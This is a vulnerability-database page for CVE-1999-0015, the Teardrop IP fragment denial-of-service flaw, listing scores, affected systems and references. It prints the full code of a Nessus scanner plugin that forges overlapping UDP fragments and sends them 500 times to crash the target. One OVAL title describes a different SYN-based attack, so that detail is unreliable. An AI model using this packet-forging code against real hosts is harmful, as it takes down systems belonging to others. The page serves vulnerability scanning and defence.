Vulnerabilities > CVE-1999-0015

CVSS 5.0 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

NONE

Integrity impact

NONE

Availability impact

PARTIAL

network

low complexity

microsoft

netbsd

sun

nessus

exploit available

NVD

Published: 1997-12-16

Updated: 2018-05-03

Summary

Teardrop IP denial of service.

Vulnerable Configurations

Part	Description	Count
OS	Hp HP HP UX 9.00 HP HP UX 9.01 HP HP UX 9.03 HP HP UX 9.04 HP HP UX 9.05 HP HP UX 9.07 HP HP UX 10 HP HP UX 10.01 HP HP UX 10.16 HP HP UX 10.20 HP HP UX 10.24 HP HP UX 10.30 HP HP UX 11.00	13
OS	Microsoft Microsoft Windows 95 0.0A Microsoft Windows NT 3.5.1 Microsoft Windows NT 4.0	7
OS	Netbsd Netbsd Netbsd 1.0 Netbsd Netbsd 1.1 Netbsd Netbsd 1.2 Netbsd Netbsd 1.2.1	4
OS	Sun SUN Sunos 4.1.3U1 SUN Sunos 4.1.4	2

Exploit-Db

description	HP HP-UX 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3. CVE-1999-0015. Remote exploi...
id	EDB-ID:19103
last seen	2016-02-02
modified	1997-11-13
published	1997-11-13
reporter	G P R
source	https://www.exploit-db.com/download/19103/
title	HP HP-UX <= 10.34,ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3

Nessus

NASL family	Denial of Service
NASL id	TEARDROP.NASL
description	It was possible to make the remote server crash using the
last seen	2020-06-01
modified	2020-06-02
plugin id	10279
published	1999-06-22
reporter	This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/10279
title	TCP/IP IP Fragment Re-Assembly Remote DoS (teardrop)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(10279); script_version("1.36"); script_cvs_date("Date: 2019/03/06 18:38:55"); script_cve_id("CVE-1999-0015"); script_bugtraq_id(124); script_name(english:"TCP/IP IP Fragment Re-Assembly Remote DoS (teardrop)"); script_summary(english:"Crashes the remote host using the 'teardrop' attack"); script_set_attribute(attribute:"synopsis", value:"The remote system is affected by a denial of service vulnerability."); script_set_attribute(attribute:"description", value: "It was possible to make the remote server crash using the 'teardrop' attack. An attacker may use this flaw to shut down this server, thus preventing your network from working properly."); script_set_attribute(attribute:"solution", value:"contact your operating system vendor for a patch."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"1997/11/13"); script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_KILL_HOST); script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc."); script_family(english:"Denial of Service"); script_require_keys("Settings/ParanoidReport"); exit(0); } include("audit.inc"); include("global_settings.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); if ( TARGET_IS_IPV6 ) exit(0); # Our constants MAGIC = 2; IPH = 20; UDPH = 8; PADDING = 0x1c; MAGIC = 0x3; IP_ID = 242; sport = 123; dport = 137; LEN = IPH + UDPH + PADDING; src = compat::this_host(); ip = forge_ip_packet(ip_v : 4, ip_hl : 5, ip_tos : 0, ip_id : IP_ID, ip_len : LEN, ip_off : IP_MF, ip_p : IPPROTO_UDP, ip_src : src, ip_ttl : 0x40); # Forge the first UDP packet LEN = UDPH + PADDING; udp1 = forge_udp_packet(ip : ip, uh_sport : sport, uh_dport : dport, uh_ulen : LEN); # Change some tweaks in the IP packet LEN = IPH + MAGIC + 1; ip = set_ip_elements(ip: ip, ip_len : LEN, ip_off : MAGIC); # and forge the second UDP packet LEN = UDPH + PADDING; udp2 = forge_udp_packet(ip : ip, uh_sport : sport, uh_dport : dport, uh_ulen : LEN); # Send our UDP packets 500 times start_denial(); send_packet(udp1,udp2, pcap_active:FALSE) x 500; sleep(10); alive = end_denial(); if(!alive){ set_kb_item(name:"Host/dead", value:TRUE); security_hole(port:dport, proto:"udp"); }

Oval

accepted

2008-08-25T04:00:18.670-04:00

class

vulnerability

contributors

name	Michael Wood
organization	Hewlett-Packard

description

Teardrop IP denial of service.

family

unix

oval:org.mitre.oval:def:5579

status

accepted

submitted

2008-07-11T14:41:52.000-04:00

title

A TCP SYN packet with target host's address as both source and destination can cause system hangs.

version

References

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5579

Vulnerabilities > CVE-1999-0015 {"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Vulnerabilities","item":"https://cyber.vumetric.com/vulns/"},{"@type":"ListItem","position":2,"name":"CVE-1999-0015"}]}

Summary

Vulnerable Configurations

Exploit-Db

Nessus

Oval

References

Vulnerabilities > CVE-1999-0015